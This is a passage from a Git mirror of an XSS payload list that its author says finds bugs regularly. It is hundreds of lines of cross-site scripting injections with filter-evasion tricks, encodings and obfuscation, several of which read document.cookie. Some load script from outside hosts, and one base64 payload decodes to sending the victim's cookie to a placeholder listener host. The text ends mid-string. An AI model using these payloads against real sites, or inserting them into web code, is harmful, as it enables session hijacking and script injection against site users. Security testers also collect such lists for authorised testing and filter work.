ch0ic3/XSS
1
0
Fork 0
mirror of https://github.com/ShadowByte1/XSS.git synced 2024-12-18 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
0455761930
XSS/XSS_Payloads.txt

2899 lines
201 KiB
Plaintext
Raw Normal View History

XSS Payload Files that get me bugs all the time XSS Payload Files that get me bugs all the time
2024-08-07 06:36:07 +00:00
<script>/*%0A*/alert(1)//</script>
<img src="javascript:/*%0A*/alert('XSS');">
<svg onload=alert(1)>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
<div onmouseover="alert(String.fromCharCode(88,83,83))">hover me!</div>
<body onpageshow="alert('XSS')">
<img/src<>video><source OnErRoR="alert(1)">
<ScRipT>alert('XSS')</ScRipT>
<IMG SRC="JaVaScRiPt:alert('XSS')">
<audio src="x" onerror="alert(1);"></audio>
<video poster=javascript:alert(1)//></video>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">XSS</a>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3Ealert%28%27XSS%27%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
JaVaScRiPt:alert(1)//';alert(2)//
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<script src="//external.example.com/malicious-script.js"></script>
<div style="background:url('javascript:alert(1)')">
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=`x` onerror=alert(1)>
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
&#60;script&#62;alert('XSS')&#60;/script&#62;
<script>alert('XSS')<!--/script>
<svg><!-- --> <onload alert(1) //
<img src=x oneonerrorrror=alert(1)>
<input type="image" src=x onerror="alert(1)">
<keygen autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta content="&NewLine;bypass&NewLine;; onmouseover=alert(1)" http-equiv="default-style">
<a href="%C0%AE%C0%AEa%C0%AEa%C0%AEa%C0%AEa%C0%AEa%C0%AEa%C0%AEj%C0%AEa%C0%AEv%C0%AEa%C0%AEs%C0%AEc%C0%A...
<script>alert("\u0058\u0053\u0053")</script>
<div style="width: expression(alert('XSS'));"></div>
<svg height="50" width="50" onload=alert(1)>
<script src="http://_:alert('XSS')"></script>
<a href="javascript:alert('XSS')">click me</a>
<iframe src="javascript:alert(1)" sandbox="allow-scripts"></iframe>
<script>al\u0065rt(1)</script>
<a href="jav&#x0D;ascript:alert('XSS')">click me</a>
<script>alert(1)<
<iframe src="http://victim.example/xss.html"<iframe>
<a href="%E0%A4%B9%E0%A5%B1%E0%A5%B2script%E0%A4%B9%E0%A5%B1%E0%A5%B2:alert(1)//">link</a>
<img """><script>alert("XSS")</script>">
<iframe/src \/\/onload = alert(1)>
<script>x="al";y="ert(1)";eval(x+y);</script>
<!-- anything --!><script>alert(1)</script>
<layer src="javascript:alert('XSS')">
<bgsound src="javascript:alert('XSS');">
<li style=list-style:url() onerror=alert(1)></li>
<div style=content:url(javascript:alert(1))></div>
<svg><style>{font-family&colon;<iframe/onload=confirm(1)></iframe>};
<input/onmouseover="javaSCRIPT&#58confirm&lpar;1&rpar;" value=`` <type='text'>
<img src="x` `<script>alert(1)</script>" alt="` `<script>alert(1)</script>">
<img src=`xx:xx` onerror=eval('confir\u006d(1)')>
<div style="background:url('x:confirm(1);')">
<div style="width: expression(confirm(1));">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3Econfirm(1)%3C%2F%73%63%72%69%70%74%3E"></iframe>
<svg/onload='&lbrace;this["src"]=top["location"];confirm(1);&rbrace;'>
<iframe srcdoc='<svg><script>confirm&lpar;1)</script>'></iframe>
<math><mtext></mtext><annotation-xml encoding="application/xhtml+xml"><input autofocus onfocus=confirm(1)></annotation-xml></math>
<table background="javascript:confirm(1)">
<!--[if gte IE 9]><video><source onerror="confirm(1)"><![endif]-->
<audio src="data:audio/x-wav;base64,UklGRigAAABXQVZFZm10IBAAAAABAAEAgD4AAAB9AAACABAAZGF0YYCAA..." onerror="confirm(1)">
<object data=javascript:confirm(1)>
<object type=text/html data="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDEpPC9zY3JpcHQ+"></object>
<embed src="javascript:confirm(1)">
<embed type="image/svg+xml" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iY29uZmlybSgxKSI+PC9zdmc+">
<script src=data:,alert(1)></script>
<details open ontoggle="confirm(1)">
<b style="color:rgb(0,0,0);background-color:rgb(0,0,0);:focus{outline:none};" tabindex=1 onFocus=confirm(1)>Click me</b>
<div style="position:absolute;width:100%;height:100%;top:0;left:0" onclick="confirm(1)">Click anywhere on the page</div>
<vbscript:msgbox("XSS")>
<marquee onstart="confirm(1)">
<keygen focus keygenfocus="alert(1)" autofocus>
<menu><command label="Click me"
icon="javascript:confirm(1);"></command></menu>
<menu type="context"><menuitem label="Click me" icon="javascript:confirm(1);" onclick="confirm(1)"></menuitem></menu>
<frameset onload=confirm(1)>
<frame src="javascript:confirm(1)">
<? echo '<SCR'.'IPT>alert(1)</SCR'.'IPT>'; ?>
<event-source src="event.php" onmessage="confirm(1)">
<a href="javascript:\u0063onfirm(1)">Click me</a>
<isindex action="javascript:confirm(1)" type="submit">
<style>@import 'javascript:confirm(1)';</style>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">confirm(1)</x:script>
<xss style="xss:expression(confirm(1))">
<meta http-equiv="refresh" content="0; url=javascript:confirm(1);">
<iframe src="http://victim.example.com/#" srcdoc="<script>confirm(1)</script>"></iframe>
<iframe src="javascript:confirm(1)" onload="this.src='about:blank'"></iframe>
<div style="list-style-image: url(javascript:confirm(1))"></div>
<q oncut="confirm(1)">Select and right-click to cut me</q>
<div draggable="true" ondragend="confirm(1)">Drag me and drop me</div>
<select autofocus onfocus="confirm(1)"><option>Item</option></select>
<textarea id="x" style="display:none" onfocus="confirm(1)"></textarea><label for="x">Click me</label>
<div style="background:url(javascript:confirm(1)) no-repeat fixed center;"></div>
<base href="javascript:">
<base href="javascript:confirm(1);//">
<object type="text/x-scriptlet" data="http://example.com/scriptlet.sct"></object>
<script src="data:text/javascript,confirm(1)"></script>
<card onclick="confirm(1)">Click here</card>
<iframe srcdoc="&lt;script&gt;confirm(1)&lt;/script&gt;"></iframe>
<svg><animate onbegin=alert(1)>
<title onpropertychange=alert(1)>
<link href=//\ rel=stylesheet onerror=alert(1)>
<q oncut=open()>alert(1)</q>
<iframe/srcdoc="<svg><script href=//></svg>">
<img src=1 href=1 onerror=alert(1) alt=1>
<body onload=$.getScript`//x.ss`>
<svg><set attributeName=onload to=alert(1)>
<math><maction actiontype=alert href=//>XSS</maction></math>
<keygen focus onfocus=alert(1)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?. >
%27"><A%20HRef=\"%20AutoFocus%20OnFocus=top/**/?. >
#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<iframe src="javascript:alert(document.domain)"></iframe>
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<img src=x onerror="alert(origin)">
"*alert(1)*"
ibro"*alert(1)*"
alert?.(1)
<script>eval('al'+'ert(1)');</script>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
<img onfocus=alert(1) autofocus tabindex=1>
<p onfocus=alert(1) autofocus tabindex=1>
<form onfocus=alert(1) autofocus tabindex=1>
<svg onfocus=alert(1) autofocus tabindex=1>
<wbr onfocus=alert(1) autofocus tabindex=1>
<hgroup onfocus=alert(1) autofocus tabindex=1>
<ul onfocus=alert(1) autofocus tabindex=1>
<video onfocus=alert(1) autofocus tabindex=1>
<mark onfocus=alert(1) autofocus tabindex=1>
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">
<plaintext onfocus=alert(1) autofocus tabindex=1>
<video controls src=1 onfocus=alert(1) autofocus>
<svg><image href=1 onerror=alert(1)>
<audio src/onerror=alert(1)>
<ol onfocus=alert(1) autofocus tabindex=1>
<image2 onfocus=alert(1) autofocus tabindex=1>
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload=alert/*1337*/(1)>
<svg/onload=alert//&NewLine;(2)>
<svg/onload=alert&sol;**&sol;(3)>
<svg/onload=alert/&#42;&#42;/(4)>
<svg/onload=alert&#x2F;**&#47;(5)>
confirm?.(1)
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
"><svg onScroll="javascript:alert(1)//
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError=prompt()>
"><script>prompt()</script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<script>script>prompt()</script>
<svg/onload=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
onpointerover=”alert(XSS)
jAvaScripT:(alert)`1`
javascript:alert('1')
"onpointerover=”alert(XSS)
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
onclick=”alert(XSS)
onmouseover=”alert(XSS)
onload=”alert(XSS)
onerror=”alert(XSS)
onfocus=”alert(XSS)
onblur=”alert(XSS)
onchange=”alert(XSS)
oninput=”alert(XSS)
onsubmit=”alert(XSS)
onkeydown=”alert(XSS)
onkeydown=”alert(XSS)
onpointerover=”alert(XSS)
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//";alert(String.fromCharCode(88,83,83))
<svg onload=prompt&#0000000040document.domain)>"
%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
";eval(unescape(location))//# %0Aalert(0)
¼script¾alert(¢XSS¢)¼/script¾
<img src=1 onerror=alert(1)>
&#x3C;img src=1 onerror=alert(1)&#x3E;
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
onfocus=alert(1)
onfocus=alert(1) autofocus=
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
onmouseover=alert(1)
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg%20oNinad=1%20onload=alert(document.cookie)>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
%script%alert(CXSS¢)4/script%
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
<XSS STYLE="Xss:expressionfalert('XSS'))">
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
"<svg onload=alert (1)> " ;
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
#<img src=1 onerror=alert(1)>
<a/href=javascript&colon;alert()>click
<body >
<a href="javascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<img src="java script:al ert('Successful XSS')">
<img src="java script:al ert('Successful XSS')">
<a href=" &#x8; &#23; javascript:alert('Successful XSS')">Click this link!</a>
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>
<img dynsrc="javascript:alert('Successful XSS')">
<img src=`javascript:alert("The name is 'XSS'")`>
<body background="javascript:alert('Successful XSS')">
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
'onfocus='alert(1)' autofocus='
<xml onreadystatechange=alert(1)>
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<input type="image" src="javascript:alert('Successful XSS')">
%26%23x2f%3B%26%23x2f%3Br4y.pw
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click
<d3v/onauxclick=(((confirm)))``>click
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
svg/onload=alert(document.cookie)abcdef@test.com
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
[alert][0].call(this,1)
&lt;script&gt;alert(1)&lt;/script&gt;
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
<d3v/onmouseleave=[2].some(confirm)>click
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
”al”;b=”ert”;self[a+b]();
a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(YWxlcnQoMSk=))”;self[a+b](c+d+e+f)();
"><svg%20onload=alert%26%230000000040"1")>
<img/src=x onError="`${x}`;alert(`XSS`);">
-top['al\x65rt']('xss')-
<svg/on%20onload=alert(1)>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
_0x68087f:alert(0x1);
/?xss=500); alert(document.cookie);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
"></SCRIPT>”>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
"><img src=1 onmouseleave=print()>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B
<IMG SRC="jav ascript:alert('XSS');">
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2